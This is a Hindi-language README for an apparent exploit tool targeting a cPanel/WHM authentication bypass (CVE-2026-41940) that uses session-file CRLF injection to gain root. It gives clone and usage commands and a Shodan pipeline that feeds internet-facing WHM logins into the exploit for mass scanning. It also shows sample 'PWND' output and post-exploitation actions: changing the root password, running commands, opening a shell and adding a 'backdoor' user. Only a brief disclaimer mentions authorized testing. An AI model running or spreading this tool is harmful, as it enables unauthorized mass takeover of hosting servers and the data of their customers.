
cPanel और WHM - सत्र-फ़ाइल CRLF इंजेक्शन के माध्यम से प्रमाणीकरण बाईपास
⚡ बिना प्रमाणीकरण के रूट – सत्र-फ़ाइल CRLF इंजेक्शन ⚡
"एक चेन जो सब पर राज करती है।"
┌─────────────────────────────────────────────────────────────┐
│ चरण 1 ── पूर्व-प्रमाणीकरण सत्र कुकी बनाएं │
│ चरण 2 ── `Authorization` हेडर के माध्यम से CRLF इंजेक्शन │
│ चरण 3 ── `do_token_denied` (raw → cache) ट्रिगर करें │
│ चरण 4 ── JSON API के माध्यम से WHM रूट पहुंच सत्यापित करें │
└─────────────────────────────────────────────────────────────┘
💥 परिणाम – बिना किसी क्रेडेंशियल के WHM तक पूर्ण रूट पहुंच।
यह प्रोजेक्ट MIT लाइसेंस के तहत जारी किया गया है – उपयोग, संशोधन और वितरण के लिए स्वतंत्र, लेकिन बुराई न करें 😈।
विवरण के लिए LICENSE फ़ाइल देखें।
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
शून्य निर्भरताएँ – केवल Python 3 मानक लाइब्रेरी।
आपकोpip,virtualenv, या उस तरह की किसी चीज़ की ज़रूरत नहीं है।
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
एक बार जब आप सिस्टम को हैक कर लेते हैं, तो आप यह कर सकते हैं:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (पूर्ण WHM टर्मिनल)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
कॉन्फ़िगरेशन:
लक्ष्य : 1
थ्रेड्स : 10
टाइमआउट : 15s
क्रिया : केवल स्कैन
[10:23:15] [SCAN] 4-चरणीय शोषण श्रृंखला शुरू... https://192.168.1.100:2087
[10:23:15] [INFO] कैनोनिकल होस्टनाम खोजा गया: server.example.com
[10:23:15] [STEP] चरण 1/4 — पूर्व-प्रमाणीकरण सत्र बनाया जा रहा है...
[10:23:16] [ OK] चरण1: पूर्व-प्रमाणीकरण सत्र = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] चरण 2/4 — Authorization हेडर के माध्यम से CRLF इंजेक्शन...
[10:23:17] [ OK] चरण2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] चरण 3/4 — do_token_denied गैजेट फायर करना (raw→cache)...
[10:23:18] [ OK] चरण3: HTTP 401 — do_token_denied गैजेट फायर हुआ
[10:23:18] [STEP] चरण 4/4 — WHM रूट पहुंच सत्यापित की जा रही है...
[10:23:18] [INFO] चरण4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 पुष्ट — WHM रूट पहुंच! (v11.118.0.63 — असुरक्षित पुष्ट)
[10:23:18] [PWND] टोकन : /cpsess1234567890
[10:23:18] [PWND] सत्र : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] संस्करण : 11.118.0.63
[10:23:18] [PWND] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — स्कैन पूर्ण
समय: 3.2s · लक्ष्य: 1
1 असुरक्षित लक्ष्य
[*] लक्ष्य : https://192.168.1.100:2087
[*] संस्करण : 11.118.0.63
[*] टोकन : /cpsess1234567890
[*] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] सत्र : 9a7f8e3d2c1b0a9f
[*] साक्ष्य : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
इन बिल्ड्स से नीचे के सभी संस्करण असुरक्षित हैं।
0xgh057r3c0n – सुरक्षा शोधकर्ता, रिवर्स इंजीनियर, और कॉफ़ी प्रेमी।
GitHub | Twitter
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक और योगदानकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।
ज़िम्मेदारी से उपयोग करें, और हमेशा पहले अनुमति लें।
🔥 ग्रह को हैक करें, लेकिन कानूनी रहें। 🔥
| फ़्लैग | विवरण |
|---|
-u, --url | एकल लक्ष्य URL (जैसे https://host:2087) |
-l, --list | फ़ाइल जिसमें प्रति पंक्ति एक URL हो |
--hostname | कैनोनिकल Host हेडर ओवरराइड करें (स्वतः-खोजा गया) |
-t, --threads | थ्रेड्स (डिफ़ॉल्ट: 10) |
--timeout | सेकंड में टाइमआउट (डिफ़ॉल्ट: 15) |
--rate-limit | लक्ष्यों के बीच प्रतीक्षा (सेकंड) |
--action | पोस्ट-शोषण: list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | नया रूट पासवर्ड (--action passwd के साथ) |
--cmd | OS कमांड (--action cmd/exec के साथ) |
--new-user | नया cPanel उपयोगकर्ता नाम (--action adduser के साथ) |
--new-domain | नया cPanel डोमेन (--action adduser के साथ) |
-o, --output | परिणाम JSON में सहेजें |
| शाखा | पैच किया गया बिल्ड | स्थिति |
|---|
| 11.110 | 11.110.0.97 | 🛡️ ठीक |
| 11.118 | 11.118.0.63 | 🛡️ ठीक |
| 11.126 | 11.126.0.54 | 🛡️ ठीक |
| 11.132 | 11.132.0.29 | 🛡️ ठीक |
| 11.134 | 11.134.0.20 | 🛡️ ठीक |
| 11.136 | 11.136.0.5 | 🛡️ ठीक |